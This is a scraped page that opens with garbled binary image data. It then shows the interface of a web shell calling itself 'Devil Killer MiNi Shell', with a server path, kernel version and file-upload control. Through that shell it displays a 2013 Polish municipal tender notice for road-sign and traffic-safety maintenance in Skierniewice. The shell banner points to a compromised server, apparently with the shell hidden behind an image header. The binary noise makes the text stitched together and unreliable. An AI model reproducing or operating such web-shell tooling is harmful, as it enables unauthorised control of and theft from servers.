JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131211/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131211/512606-N-2013.html

<p class="kh_header"><b>Skierniewice: Konserwacja i odnawianie znaków pionowych oraz urządzeń bezpieczeństwa ruchu na ulicach miasta Skierniewice</b><br>
<b>Numer ogłoszenia: 512606 - 2013; data zamieszczenia: 11.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.skierniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja i odnawianie znaków pionowych oraz urządzeń bezpieczeństwa ruchu na ulicach miasta Skierniewice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis:
Przedmiotem zamówienia jest konserwacja i odnawianie znaków pionowych oraz urządzeń bezpieczeństwa ruchu na ulicach miasta Skierniewice.

2. Zakres zamówienia:

a) wymiana znaków drogowych pionowych, luster drogowych, znaków informacji miejskiej, progów zwalniających, tablic informacji bramowej,
b) wymiana słupków do znaków,
c) poprawienie, regulacja znaków w pionie i kąta ich ustawienia, prawidłowe zorientowanie kierunku tarcz znaków obróconych, obsuniętych i obluzowanych powstałych w wyniku aktów wandalizmu wraz z dokręcaniem śrub mocujących, właściwe mocowanie, np. opuszczonych tarcz i uzupełnianie brakujących uchwytów wraz ze śrubami, usuwanie naklejek i graffiti,
d) drobne naprawy  lic znaków, polegające na uzupełnieniu części emblematów i napisów
e) mycie pionowych znaków, luster oraz innych urządzeń bezpieczeństwa ruchu                    w zależności od potrzeb,
f) wprowadzania zmian w organizacji ruchu na podstawie opracowanych przez zarządzającego ruchem projektów organizacji ruchu,
g) montaż, demontaż znaków drogowych pionowych, luster drogowych, znaków informacji miejskiej, progów zwalniających, słupków, tablic informacji bramowej,
h) odnowienie słupków znaku, znaków drogowych pionowych, luster drogowych, znaków informacji miejskiej, progów zwalniających, tablic informacji bramowej, montaż odnowienie barier zabezpieczających, wygrodzeń ramowych,
i) montaż, demontaż oraz naprawa i konserwacja innych urządzeń bezpieczeństwa ruchu
drogowego (np. pylony, słupki blokujące, konstrukcje nietypowe),
j) zabezpieczenie prac związanych z wykonywaniem przedmiotu zamówienia,
k) montaż i demontaż tymczasowego oznakowania pionowego wprowadzanego na podstawie opracowanych przez zarządzającego ruchem na drogach miasta Skierniewice projektów organizacji ruchu
l) złomowanie zdemontowanych zużytych urządzeń bezpieczeństwa ruchu drogowego             (za zgodą Zamawiającego).
m) naprawa nawierzchni (uzupełnianie i zagęszczanie) w bezpośrednim obrębie znaków pionowych i urządzeń bezpieczeństwa ruchu, uszkodzonej w wyniku demontażu, montażu lub odtworzeniu zniszczonych znaków.
n) mocowanie zerwanych łańcuchów przy barierach łańcuchowych,
o) malowanie słupków znaków i urządzeń bezpieczeństwa ruchu już ustawionych,                                     a wymagających odnowienia,
p) transport materiałów Zamawiającego w miejsce składowania Wykonawcy.
q) okresowa kontrola oznakowania

3. Prace wymienione powyżej mogą być realizowane w trzech trybach:

a) tryb awaryjny (2 godziny) - obejmuje on montaż znaków zniszczonych lub skradzionych mających istotne znaczenie dla bezpieczeństwa ruchu drogowego, np.: A-7, B-2, B-20, D-6, D-6b itp., 
b) tryb podstawowy (6 godzin) - obejmuje montaż pozostałych znaków z grupy ostrzegawczych, nakazu i zakazu,
c) tryb normalny (10 dni) - obejmuje on planowane wymiany oraz montaż innych urządzeń bezpieczeństwa ruchu drogowego.

4. Wykonawca zapewni, aby tymczasowo składowane materiały (będące własnością Zamawiającego), do czasu gdy będą one potrzebne do wykonania prac, były zabezpieczone przed zanieczyszczeniem, zachowały swoją jakość i właściwość oraz były dostępne do kontroli przez inspektora nadzoru

5. Ogólne wymagania dotyczące sprzętu:
Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie spowoduje niekorzystnego wpływu na jakość wykonywanych prac. Liczba                        i wydajność sprzętu będzie gwarantować przeprowadzenie prac, zgodnie z zasadami określonymi w SIWZ. Sprzęt będący własnością Wykonawcy lub wynajęty do wykonania prac ma być utrzymywany w dobrym stanie i gotowości do pracy. Będzie on zgodny z normami ochrony środowiska i przepisami dotyczącymi jego użytkowania. 

6. Sprzęt do wykonania oznakowania pionowego:
Wykonawca przystępujący do wykonania oznakowania pionowego musi wykazać się
możliwością korzystania z następującego sprzętu:
a) wiertnica do wykonywania dołów pod słupki w gruncie spoistym,
b) gilotyna do kostki brukowej,
c) środków transportowych do przewozu materiałów,
d) sprzętu spawalniczego, agregatu itp.
e) oznakowany samochód dostawczy umożliwiający transport pracowników, rur, stojaków oraz znaków i tablic wraz ze sprzętem koniecznym do ich montażu.

7. Wykonawca na czas realizacji zamówienia winien dysponować minimum 4 osobami zdolnymi do wykonania przedmiotu zamówienia.

8. Opis stosowanych znaków:
Znaki muszą być zgodne z Rozporządzeniem Ministrów Infrastruktury oraz Spraw Wewnętrznych i Administracji z dnia 31 lipca 2002 roku w sprawie znaków                        i sygnałów drogowych (Dz. U. z 2002r., Nr 170, poz. 1393) oraz spełniać wymogi wynikające ze Szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunki ich umieszczania na drogach (Załączniki nr 1 - 4 do rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. - Załącznik do Dz. U. Z 2003r., nr 220, poz. 2181).
Tarcze znaków montowane w ramach zamówienia muszą być wykonane na podłożu aluminiowym lub w zależności od potrzeb na podłożu stalowym ocynkowanym ogniowo. Tarcze znaków muszą być usztywnione profilem montażowym z podwójnie giętą krawędzią na całym obwodzie. Grubość tarczy znaku dla blach stalowych ocynkowanych - min. 1,5 mm oraz dla tarcz z blach aluminiowych - 2,0 mm.
Znaki należy wykonać z folii odblaskowej II typu dla znaków A-7, B-2, B-20, D-6,      D-6a, D 6b a dla pozostałych z folii odblaskowej I typu. Zastosowane folie odblaskowe muszą mieć ważne świadectwo dopuszczenia do stosowania w budownictwie drogowym wydane przez podmiot uprawniony do kontroli jakości potwierdzający, że produkty odpowiadają określonym normom lub specyfikacjom technicznym.

9. Słupki do znaków drogowych i konstrukcje wsporcze. 
Do umieszczania znaków drogowych i tablic należy stosować słupki i konstrukcje wsporcze wykonane z rur stalowych, ocynkowanych hutniczo lub ogniowo                              o średnicach 60 lub 76,1 mm. Słupki w części podziemnej winny posiadać poprzeczny element stabilizujący zabezpieczający przed obrotem. Część podziemna słupka winna być zabezpieczona farbami lub substancjami bitumicznymi. Wierzchołek słupka musi być zabezpieczany kapturem ochronnym zabezpieczającym przed wciekaniem do wnętrza wody. Słupki w wykopie należy stabilizować betonem.

10. Uchwyty i elementy montażowe. 
W ceny oferowanych tarcz znaków i tablic wkalkulowane są uchwyty i inne elementy montażowe. Dla uchwytów uniwersalnych opartych o śruby i nakrętki należy każdorazowo stosować miseczki utrudniające demontaż przez osoby niepowołane. W miejsce uchwytów tych dopuszcza się mocowanie tarcz znaków i tablic taśmami montażowymi, przy czym szerokość taśmy winna uniemożliwiać samoczynny obrót tarczy oraz w znacznym stopniu utrudniać obracanie tarcz przez wandali.

11. Progi zwalniające.
Na terenie miasta stosowane są progi zwalniające wykonywane z gumy lub tworzyw sztucznych z wyklejonymi pasami odblaskowa taśmą lub posiadające trwała barwę wytwórczą. Dodatkowo Zamawiający przewiduje ich wymianę oraz budowę nowych wykonanych z kostki betonowej.

12. Lustra drogowe.
Dopuszcza się stosowanie luster drogowych okrągłych lub prostokątnych poliwęglanowych, przy czym stosowane lustra bezwzględnie muszą posiadać atest bezpieczeństwa B lub jego odpowiednik wydany przez podmiot uprawniony do kontroli jakości.

13. Warunki dodatkowe.
a) Wykonawca prac zobowiązany będzie do prowadzenia dziennika oznakowania pionowego według wzoru określonego przez Zamawiającego. Potwierdzone przez Zamawiającego zapisy w dzienniku stanowić będą jedyna podstawę zobowiązań finansowych Zamawiającego.
b) Wykonawca prac zobowiązany będzie do prowadzenia dziennika przekazanych materiałów.
c) Wykonawca zobowiązuje się do ciągłego posiadania zestawu awaryjnego tj. znaków drogowych: A-7, B-2, B-20, D-6, D-6a, D 6b (po 2 komplety).
d) Wykonawca udzieli zamawiającemu gwarancji z tytułu wad fizycznych przedmiotu umowy na okres minimum 6 miesięcy, licząc od dnia odbioru wykonanych prac.
e) Wykonawca zobowiązuje się do ciągłego przeglądu stanu oznakowania pionowego na sieci drogowej miasta Skierniewice i na bieżąco wykonywania poprawek . W ramach tego zadania Wykonawca zobowiązany jest do przeprowadzenia raz w tygodniu przeglądu stanu oznakowania dróg krajowych, wojewódzkich i powiatowych oraz gminnych. Stwierdzone w czasie przeglądu nieprawidłowości należy natychmiast usunąć odnotowując to w dzienniku oznakowania pionowego. Jednocześnie Wykonawca prowadził będzie dziennik własnego wzoru, w którym będzie odnotowywał informacje z przeglądów. Dziennik ten będzie dostępny do wglądu Zamawiającego (przekazywany w formie elektronicznej lub dostarczony do siedziby Zamawiającego).
14. Prace będą zlecane zależnie od bieżących potrzeb Zamawiającego w związku                  z niemożliwością zaplanowania ich orientacyjnych ilości.

15. Prace będą zlecane zależnie od bieżących potrzeb i rozliczane będą w oparciu                  o zaoferowane stawki.

16. Szczegółowy zakres prac zawarty w załączniku nr 7 do SWIZ.

Uwaga!
Tam, gdzie w opracowaniu zostały wskazane normy, aprobaty, specyfikacje                       i systemy,  o których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający dopuszcza oferowanie rozwiązań RÓWNOWAŻNYCH. Wykonawca, który powołuje się na rozwiązania równoważne opisane przez Zamawiającego, jest obowiązany wykazać, że oferowane materiały, spełniają wymagania określone przez Zamawiającego. 
Dopuszcza się innych producentów materiałów, niż podani w opracowaniu, pod warunkiem zagwarantowania RÓWNORZĘDNYCH parametrów technicznych i technologicznych oraz zgodności z obowiązującymi wymaganiami prawnymi.

17. Wykonawca zobowiązany jest do zapewnienia bezpieczeństwa i utrzymywania porządku na terenie wykonywanych prac.

18. Rozliczanie następować będzie zbiorczo jeden raz w miesiącu na postawie protokołów odbioru wykonanych prac oraz obmiarów powykonawczych potwierdzających wykonanie danego zakresu prac;

19. Kod zamówienia wg CPV: 
50230000-6 Usługi w zakresie napraw i konserwacji i podobne usługi osprzętu dróg           i innego sprzętu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.23.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości:           2 000,00 zł (słownie: dwa tysiące zł) w terminie do dnia 19.12.2013 r. do godz. 10:00  
2.Wadium może być wniesione w następujących formach: 
2.1 pieniądzu, na rachunek nr konta: Powszechna Kasa Oszczędności Bank Polski SA nr 81 1020 3352 0000 1402 0193 3969 z  dopiskiem DK - wadium -Konserwacja i odnawianie znaków pionowych oraz urządzeń bezpieczeństwa ruchu na ulicach miasta Skierniewice w 2014r,
2.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
2.3. gwarancjach bankowych, 
2.4. gwarancjach ubezpieczeniowych, 
2.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
3. Wadium wnosi się przed upływem terminu składania ofert.
4. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowych lub gwarancji ubezpieczeniowych należy złożyć w oryginale w siedzibie Zamawiającego w kasie. 
5. Za skutecznie wniesione wadium w pieniądzu Zamawiający uważa wadium, które do dnia 19.12.2013 r., do godz. 10:00 włącznie, znajdzie się na koncie Zamawiającego. 
6.Zamawiający zwraca wadium w przypadkach określonych w art. 46 ustawy Prawo zamówień publicznych
7.Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt 1-4 ustawy Pzp oraz wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 ustawy oraz dostarczą dokumenty wymagane w SIWZ. Na dowód tego Wykonawca winien załączyć do oferty oświadczenia -załącznik nr 2 i nr 3 do SIWZ oraz dokumenty wymagane w SIWZ.Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę.Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dotyczący wiedzy i doświadczenia za spełniony, jeżeli Wykonawca wykaże, że należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzy zadania związane z oznakowaniem pionowym tj. montażem znaków pionowych, konserwacją i odnawianiem znaków pionowych oraz urządzeń bezpieczeństwa ruchu poparte dokumentami potwierdzającymi, że usługi zostały wykonane należycie na  łączną kwotę min: 50 000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych brutto). Na dowód tego Wykonawcy złożą wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie na łączną kwotę min. 50 000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych brutto), zgodnie z treścią załącznika nr 9 do SIWZ. Wykaz musi potwierdzać spełnienie warunku, o którym mowa w punkcie 4.1.1. SIWZ. Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę.Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dotyczący potencjału technicznego za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować na czas realizacji zamówienia narzędziami i urządzeniami niezbędnymi do wykonania zamówienia, tj.:
a) wiertnica do wykonywania dołów pod słupki w gruncie spoistym, 
b) gilotyna do cięcia kostki betonowej,
c) sprzęt spawalniczy, agregat itp.
d) środki transportu - dwa oznakowane samochody dostawcze umożliwiające transport pracowników, rur, stojaków oraz znaków i tablic wraz ze sprzętem koniecznym do ich montażu. Na dowód tego Wykonawca winien złożyć wykaz narzędzi i urządzeń technicznych dostępnych wykonawcy w celu realizacji zamówienia, wg.  wzoru określonego w załączniku nr 4 do SIWZ.  Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę.Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawcy załączą do oferty oświadczenia -załącznik nr 2 do SIWZ. Ocena spełniania warunku udziału w postępowaniu zostanie przeprowadzona na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę. Ocena spełnienia warunku wymaganego od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący sytuacji ekonomicznej i finansowej, jeśli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 100 000,00 zł (słownie: sto tysięcy złotych). Na dowód tego winien złożyć: opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100 000,00zł(słownie: sto tysięcy złotych). Ocena spełniania warunku udziału w postępowaniu zostanie przeprowadzona na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę. Ocena spełnienia warunku wymaganego od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta Wykonawcy - według wzoru załącznik nr 1 do SIWZ.
2. Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 Ustawy, sporządzone według wzoru załącznik nr 2 do SIWZ.
3.Oświadczenie o braku podstaw do wykluczenia, sporządzone według wzoru	załącznik nr 3 do SIWZ.
4.Dowód wniesienia wadium - potwierdzenie wniesienia wadium należy dołączyć do oferty. Wymagania dotyczące wadium zawarte zostały w pkt. 7 SIWZ.
